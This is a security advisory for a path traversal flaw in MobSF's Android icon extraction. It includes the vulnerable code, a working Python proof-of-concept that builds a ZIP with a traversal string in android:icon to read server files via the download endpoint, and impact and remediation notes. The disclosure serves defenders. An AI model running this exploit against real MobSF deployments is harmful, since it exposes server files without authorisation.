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GHSA-8j49-mmcx-4mp5

MediumCVSS 5.5 / 10
Published Aug 18, 2026·Last modified Aug 18, 2026
Affected Components(1)
PyPI logomobsf
< 4.5.1
Description

Summary

The find_icon_path_zip() function in MobSF does not properly sanitize the android:icon attribute extracted from an Android manifest before resolving it as a filesystem path.

An attacker can supply a malicious android:icon value containing path traversal sequences, causing MobSF to read arbitrary files from the server filesystem and copy them into the downloads directory (DWD_DIR). These files can then be retrieved by any authenticated user via the /download/<filename> endpoint, provided the file extension is included in ALLOWED_EXTENSIONS.

Details

elif icon_path.startswith(('res/', '/res/')):
    stripped_relative_path = icon_path.strip('/res')  # Works for neither /res nor res
    full_path = os.path.join(res_dir, stripped_relative_path)
    if os.path.exists(full_path):
        return full_path
    full_path += '.png'
    if os.path.exists(full_path):
        return full_path

https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/6e875fb77baa9dbe65ff8e7d0344d740e1d6d51e/mobsf/StaticAnalyzer/views/android/icon_analysis.py#L126

This code enables path traversal if a value like 'res/../../../signatures/maltrail-malware-domains.txt' is used as the icon path. This path will resolve to outside the scan directory, and the file will eventually be copied into DWD_DIR/<md5>-icon.<ext>:

icon_file = find_icon_path_zip(
        app_dic['md5'],
        res_path,
        icon_from_mfst)
    if icon_file and Path(icon_file).exists():
        dwd = Path(settings.DWD_DIR)
        out = dwd / (app_dic['md5'] + '-icon' + Path(icon_file).suffix)
        copy2(icon_file, out)
        app_dic['icon_path'] = out.name

https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/6e875fb77baa9dbe65ff8e7d0344d740e1d6d51e/mobsf/StaticAnalyzer/views/android/icon_analysis.py#L101

Because the output filename is derived from the MD5 hash of the uploaded archive (which the attacker can compute locally for his own ZIP), the attacker can deterministically retrieve the file via: GET /download/<md5>-icon.<ext>

PoC

The following script generates a malicious ZIP archive that exploits this issue by referencing an arbitrary file on the server (maltrail-malware-domains.txt):

import hashlib
import io
import zipfile

DEFAULT_HOST = "http://localhost:8000"
DEFAULT_TARGET = "res/../../../signatures/maltrail-malware-domains.txt"

MANIFEST_TEMPLATE = """\
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.poc.icontraversal">
    <application android:icon="{target}"
                 android:label="PoC App">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

MAIN_ACTIVITY = """\
package com.poc.icontraversal;
import android.app.Activity;
public class MainActivity extends Activity {}
"""

host = DEFAULT_HOST
target = DEFAULT_TARGET
host = host.rstrip("/")

# crate ZIP
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("AndroidManifest.xml", MANIFEST_TEMPLATE.format(target=target))
    zf.writestr("src/com/poc/icontraversal/MainActivity.java", MAIN_ACTIVITY)
    zf.writestr("res/drawable/placeholder.png", b"\x89PNG\r\n\x1a\n")

# compute hash
zip_bytes = buf.getvalue()
md5 = hashlib.md5(zip_bytes).hexdigest()

# write to disk
out_file = "poc_icon_traversal.zip"
with open(out_file, "wb") as f:
    f.write(zip_bytes)

import os
target_suffix = os.path.splitext(target.strip("/res").split("/")[-1])[1]
download_filename = f"{md5}-icon{target_suffix}"

print(f"[+] ZIP created : {os.path.abspath(out_file)}")
print(f"[+] Target file : {target}")
print()
print("[ Step 1 ] Upload the ZIP manually via the MobSF web UI")
print()
print("[ Step 2 ] Wait for the scan to complete, then browse to:")
print(f"    {host}/download/{download_filename}")

Impact

This vulnerability allows an attacker with scan permissions to read files from the server filesystem outside the intended scan directory, as long as the target file has an extension in ALLOWED_EXTENSIONS. This can expose internal server files that are otherwise inaccessible through any legitimate endpoint. Additionally, this behavior enables a file existence oracle for any file path regardless of extension - the attacker can infer whether a file exists by checking the icon_path field in the scan report (if the target does not exist the path will be empty).

Depending on the deployment, this may expose sensitive configuration files, internal data, or security artifacts.

Remediation

This can fixed by using the is_path_traversal function to validate user input.

Risk Scores
Base Score
5.5

The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker needs high-level or administrative privileges. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information. There is a low impact on the integrity of the data.

Threat Intelligence
5.1

Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.

EPSS
N/A

Probability that this vulnerability will be exploited in the wild within the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

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